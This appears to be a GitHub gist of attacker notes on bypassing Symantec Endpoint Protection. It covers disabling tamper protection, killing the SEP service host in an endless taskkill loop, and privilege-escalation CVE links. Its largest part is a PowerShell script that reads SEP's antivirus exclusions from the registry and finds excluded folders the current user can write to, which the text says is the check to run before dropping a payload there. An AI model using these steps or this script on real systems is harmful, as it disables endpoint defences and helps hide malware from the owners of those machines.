@gquere
Last active February 21, 2022 09:38
Kill it!

As admin, launch SymCorpUi.exe and turn off SEP's self-protection (tamper protection) in the options; as long as it is on, the service host cannot be terminated.

Then kill the service host in a loop (the step of 0 in the /L range makes the loop run forever; timeout 1 sleeps one second between kills so the process is killed again as soon as it restarts):

for /L %n in (1,0,10) do taskkill /F /IM ccSvcHst.exe & timeout 1

Privesc

CVE-2020-5825 (affects versions before 14.2 RU2): https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825

CVE-2019-18372 (affects versions before 14.2 RU2 MP1): https://www.zerodayinitiative.com/advisories/ZDI-19-990/

Exclusions

Admins will sometimes configure exclusions that amount to a full bypass (a whole extension, filename or directory is never scanned). They can be read from the registry (both hive views on 64-bit hosts):

HKLM\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions
HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Exclusions
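An added example (not part of the original gist) that dumps every exclusion stored under the two keys above and, for directory exclusions that exist on disk, tests whether the current user can write into them, which is the check you actually want before dropping a payload there. The subkey layout beneath \AV\Exclusions (the ScanningEngines\Directory\... style of nesting and the value names in it) is deliberately not assumed: every string value under either root is reported, so it works whatever the SEP version laid down. The function names are mine.

```powershell
# Added example, not code from the gist: enumerate SEP AV exclusions from the
# registry and flag excluded directories the current user can write to.
# Assumption: no particular subkey layout or value name under \AV\Exclusions;
# every string value beneath either root is treated as a potential exclusion.

$SepExclusionRoots = @(
    'HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions',
    'HKLM:\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Exclusions'
)

function Test-WritableDirectory {
    # Try to create and delete a random file; cheaper and more honest than parsing ACLs.
    param([Parameter(Mandatory)][string]$Path)
    $probe = Join-Path -Path $Path -ChildPath ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction Stop
        return $true
    } catch {
        return $false
    }
}

function Get-SepExclusion {
    [CmdletBinding()]
    param([string[]]$RegistryRoots = $SepExclusionRoots)

    foreach ($root in $RegistryRoots) {
        if (-not (Test-Path -LiteralPath $root)) {
            # Missing key: SEP not installed, or no exclusions in this hive view.
            Write-Verbose "Not present: $root"
            continue
        }
        $rootKey = Get-Item -LiteralPath $root
        # The root itself plus every subkey; leaf keys hold the actual entries.
        $keys = @($rootKey) + @(Get-ChildItem -LiteralPath $root -Recurse -ErrorAction SilentlyContinue)

        foreach ($key in $keys) {
            $relative = $key.Name.Substring($rootKey.Name.Length).TrimStart('\')
            foreach ($valueName in $key.GetValueNames()) {
                # Paths, names and extension lists are stored as strings; DWORD/binary flags are skipped.
                $kind = $key.GetValueKind($valueName)
                if ($kind -notin 'String', 'ExpandString', 'MultiString') { continue }

                $data = ($key.GetValue($valueName) -join ';')
                $expanded = [Environment]::ExpandEnvironmentVariables($data)

                # Only directory exclusions that exist on disk get a writability verdict;
                # everything else (extensions, filenames, wildcards) is reported with $null.
                $writable = $null
                if ($expanded -and (Test-Path -LiteralPath $expanded -PathType Container)) {
                    $writable = Test-WritableDirectory -Path $expanded
                }

                [pscustomobject]@{
                    Hive     = if ($root -like '*WOW6432Node*') { 'Wow64' } else { 'Native' }
                    Subkey   = $relative
                    Value    = $valueName
                    Data     = $data
                    Writable = $writable
                }
            }
        }
    }
}

# Usage: reading HKLM needs no elevation; run as the low-privileged user you actually have,
# since Writable is evaluated in that user's context.
Get-SepExclusion -Verbose |
    Sort-Object Subkey, Value |
    Format-Table -AutoSize

# Shortlist: excluded directories this user can drop files into.
Get-SepExclusion | Where-Object { $_.Writable -eq $true } | Select-Object Data
```

Run it as the unprivileged user you hold, not as admin: the Writable column is only meaningful for the account that will be writing the payload. An exclusion whose Data contains wildcards or a non-existent path shows Writable as empty; it may still be usable, but you have to resolve it by hand.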